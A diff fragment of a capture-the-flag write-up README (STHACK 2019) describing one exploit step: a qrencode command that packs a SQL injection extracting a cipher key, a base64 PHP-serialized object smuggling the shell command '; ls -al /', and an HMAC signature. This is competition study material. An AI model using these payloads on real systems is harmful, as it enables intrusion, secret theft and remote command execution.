barney0/WU-STHACK-2019/README.md

 ## **Step 5: Create your most beautiful object!**

-*qrencode '{"uid":"1000000000 union select 1,2,(SELECT cipher_key FROM cipher_keys LIMIT 1),4","t_id":"1","object":"Tzo2OiJUaWNrZXQiOjM6e3M6NzoiSGlzdG9yeSI7Tzo3OiJIaXN0b3J5IjoyOntzOjg6ImZpbGVuYW1lIjtzOjE3OiIvaGlzdG9yeS90b3RvLnBuZyI7czo0OiJkYXRhIjtzOjEyOiI7IGxzIC1hbCAvIDsiO31zOjU6Im1vdmllIjtOO3M6NDoicm9vbSI7Tjt9","sign":"48f08ca268e7d77625494b9186d953ac4a53dd7fe37de2345d1ef4a65a242749"}' -o - | base64 -w 0*
-**Object**: contain the Ticket instance
-**Sign**: hmac_mac of the object using the key

-The output will be like:
+The output of the modified php file will be like:

 ![test_id_rce](/test_id_rce.png)